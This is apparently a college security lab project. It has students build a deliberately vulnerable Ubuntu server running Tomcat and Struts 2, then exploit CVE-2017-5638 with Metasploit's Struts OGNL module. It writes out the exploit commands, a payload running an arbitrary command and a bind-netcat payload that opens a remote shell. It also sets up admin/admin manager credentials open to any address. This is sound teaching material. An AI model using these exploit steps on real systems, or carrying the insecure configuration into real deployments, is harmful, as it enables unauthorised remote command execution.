Note that this is NOT the very latest exploit, released Sept 5, 2017. For that exploit, see this project.
This exploit was released in March of 2017.
Download the latest version of Ubuntu 16.04 server. When I looked, the latest version was 16.04.03, 64-bit only.
For VMware Fusion on a Mac, the steps are:
Username: student Password: student
On your Ubuntu console, execute this command:
sudo apt update
Enter the password student when you are prompted to.
On your Ubuntu console, execute these commands:
sudo apt install openssh-server -y
ifconfig
On a Mac, in a Terminal window, execute this command, replacing the IP address with the IP address of your Ubuntu server.
Add the server fingerprint when you are prompted to.
Enter the password student when you are prompted to.
ssh student@172.16.1.198
If you are using Windows, install
PuTTY
and use it to connect to your Ubuntu server.
Accept the agreement.
Download jdk-8u144-linux-x64.tar.gz
On a Mac host, open a new Terminal window and execute these commands to move the Java installer file to the server, replacing the IP address with the IP address of your Ubuntu server.
Enter the password student when you are prompted to.
cd
cd Downloads
scp ./jdk-8u144-linux-x64.tar.gz student@172.16.1.198:/tmp
If you are using Windows, you can move files to your server with SSHSecureShellClient, which you can get here:
In the SSH session controlling your Ubuntu server, execute these commands:
cd /tmp
tar -xvf jdk-8u144-linux-x64.tar.gz
sudo mkdir -p /usr/lib/jvm
Enter the password student if you
are prompted to.
In the SSH session controlling your Ubuntu server, execute these commands:
sudo mv ./jdk1.8.0* /usr/lib/jvm/
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_144/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_144/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_144/bin/javaws" 1
sudo chmod a+x /usr/bin/java
sudo chmod a+x /usr/bin/javac
sudo chmod a+x /usr/bin/javaws
sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_144
sudo update-alternatives --config java
sudo update-alternatives --config javac
sudo update-alternatives --config javaws
If you see "nothing to configure" that's OK.
In the SSH session controlling your Ubuntu server, execute this command:
java -version
You should see
a version number,
as shown below.
In the SSH session controlling your Ubuntu server, execute these commands:
cd /tmp
wget http://apache.mirrors.hoobly.com/tomcat/tomcat-9/v9.0.0.M26/bin/apache-tomcat-9.0.0.M26.tar.gz
tar xvzf apache-tomcat-9.0.0.M26.tar.gz
sudo mkdir /usr/local/tomcat
sudo mv apache-tomcat-9.0.0.M26/* /usr/local/tomcat
In the SSH session controlling your Ubuntu server,
execute these commands:
cd
nano .bashrc
Add this line to the bottom of the file,
as shown below.
export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_144
Save the file with Ctrl+X, Y,
Enter.
In the SSH session controlling your Ubuntu server, execute this command to set the new environment variable:
source .bashrc
In the SSH session controlling your Ubuntu server,
execute this command to start Tomcat:
/usr/local/tomcat/bin/startup.sh
Tomcat starts,
as shown below.
On your host system, in a Web browser, open this URL, replacing the IP address with the IP address of your Ubuntu server.
http://172.16.1.178:8080/
You see an Apache Tomcat page, as shown below.
sudo apt update
sudo apt install unzip
cd
wget http://archive.apache.org/dist/struts/2.5.10/struts-2.5.10-all.zip
unzip struts-2.5.10-all.zip
mv struts-2.5.10 struts2
cd /tmp
wget http://mirror.metrocast.net/apache/maven/maven-3/3.5.0/binaries/apache-maven-3.5.0-bin.tar.gz
sudo tar xvzf apache-maven*.tar.gz -C /opt/
cd
nano .bashrc
Add this line to the bottom of the file,
as shown below.
export PATH=$PATH:/opt/apache-maven-3.5.0/bin
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command to set the new environment variable:
source .bashrc
In the SSH session controlling your Ubuntu server,
execute this command:
mvn -version
You see a version number,
as shown below.
cd
mvn archetype:generate \
-DgroupId=com.tutorialforlinux \
-DartifactId=myWebApp \
-DarchetypeArtifactId=maven-archetype-webapp
Many pages of "Downloading" messages
scroll by.
When you see the message: "Define value for property 'version' 1.0-SNAPSHOT: :", press Enter.
When you see the message: "Y: :", press Enter.
You see a "BUILD SUCCESS" message, as shown below.
In the SSH session controlling your Ubuntu server, execute these commands:
cd myWebApp
nano pom.xml
The file opens, as shown below.
This is an XML configuration file.
At the bottom of the file, in the "build" section, change myWebApp to basic_struts, so it is as shown below:
<build>
<finalName>basic_struts</finalName>
</build>
At the bottom of the file, in the "dependencies" section, add a new "dependency" section, as shown below: Include in the “dependencies” Section:
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-core</artifactId>
<version>2.5.10</version>
</dependency>
Save the file with Ctrl+X, Y, Enter.
To make your web app, in the SSH session controlling your Ubuntu server, execute this command:
mvn clean package
Many pages of "Downloading" messages scroll by, ending with
a green "BUILD SUCCESS" message,
as shown below.
This has created a "war" file, ready to deploy, at this location:
~/myWebApp/target/basic_struts.war
However, we don't actually need that application. We'll deploy a different one later.
cd
nano .bashrc
Add this line to the bottom of the file,
as shown below.
export CATALINA_HOME=/usr/local/tomcat
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command to set the new environment variable:
source .bashrc
Now we need to adjust the tomcat configuration
to allow administration from remote addresses.
In the SSH session controlling your Ubuntu server, execute this command:
sudo nano $CATALINA_HOME/conf/tomcat-users.xml
The "tomcat-users" section contain only
comments, as shown below.
Insert these lines into the "tomcat-users" section, as shown below.
<role rolename="manager-gui" />
<user username="admin" password="admin" roles="manager-gui"/>
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command:
sudo nano $CATALINA_HOME/conf/Catalina/localhost/manager.xml
Insert these lines into the file,
as shown below.
<Context privileged="true" antiResourceLocking="false"
docBase="${catalina.home}/webapps/manager">
<Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="^.*$" />
</Context>
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute these commands to restart Tomcat. It may take a few minutes to shut down the first time--that's OK.
sudo $CATALINA_HOME/bin/shutdown.sh
sudo $CATALINA_HOME/bin/startup.sh
Tomcat restarts,
as shown below.
http://172.16.1.198:8080/manager
A box pops up asking for credentials. Enter these credentials:
Username: admin
Password: admin
In the "Tomcat Web Application Manager" page, scroll down to the "Deploy" section, as shown below.
If you can't open the manager page, check the log with this command: When I did it, I had an error in the manager.xml file.
nano /usr/local/tomcat/logs/catalina.out
https://github.com/nixawk/labs/blob/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war
On the right side, click the Download button.
You get a file named struts2_2.3.15.1-showcase.war
Navigate to your Downloads folder and double-click the struts2_2.3.15.1-showcase.war file.
Click the Deploy button.
The Tomcat page now shows the /struts2_2.3.15.1-showcase application at the bottom of the Applications section, as shown below.
Click /struts2_2.3.15.1-showcase.
The "Struts2 Showcase" page appears, as shown below.
Save a whole-desktop screen capture with a filename of "Proj 9xa from YOUR NAME".
In a Terminal window, execute these commands to update Metasploit:
apt update
apt install metasploit-framework
In Kali,
execute this command to launch
Metasploit:
msfconsole
In Metasploit, execute this command
to find "struts" exploits:
search struts
Several exploits are found,
as shown below. We'll use the first one,
from March of 2017.
In Metasploit, execute these commands to select the exploit, show options, set the target and vulnerable URI, and exploit it.
Replace the IP address with the IP address of your Ubuntu server.
use exploit/multi/http/struts2_content_type_ognl
show options
set RHOST 172.16.1.178
set TARGETURI /struts2_2.3.15.1-showcase/showcase.action
exploit
The exploit fails,
as shown below.
What's the problem? When all else fails, consult the documentation.
Open this page:
https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl
Ths documentation says to try a "cmd/*" payload, as shown below.
In Metasploit, execute these commands to select show available payloads:
show payloads
Scroll back up several pages to see
the "cmd" payloads,
as shown below.
In Metasploit, execute these commands to set the current payload to "cmd/unix/generic", and show its options:
set PAYLOAD cmd/unix/generic
show options
We need to choose a Linux
command and put it in the "CMD"
parameter,
as shown below.
In Metasploit, execute these commands to set CMD to "touch /tmp/foo" and exploit the target:
set CMD "touch /tmp/foo"
exploit
The exploit completes, as shown below.
In the SSH session controlling your Ubuntu server, execute this command:
ls -l /tmp
The file "foo" was created,
as shown below. We have some control of the
target!
In Metasploit, execute these commands to use the "cmd/unix/bind_netcat" payload and exploit the target:
set PAYLOAD cmd/unix/bind_netcat
exploit
The exploit completes, as shown below,
and opens a shell. There is no prompt,
but you can execute commands like "whoami"
and "ls".
Save a whole-desktop screen capture with a filename of "Proj 9xb from YOUR NAME".
Email the image to cnit.124@gmail.com with a subject of "Project 9x from YOUR NAME".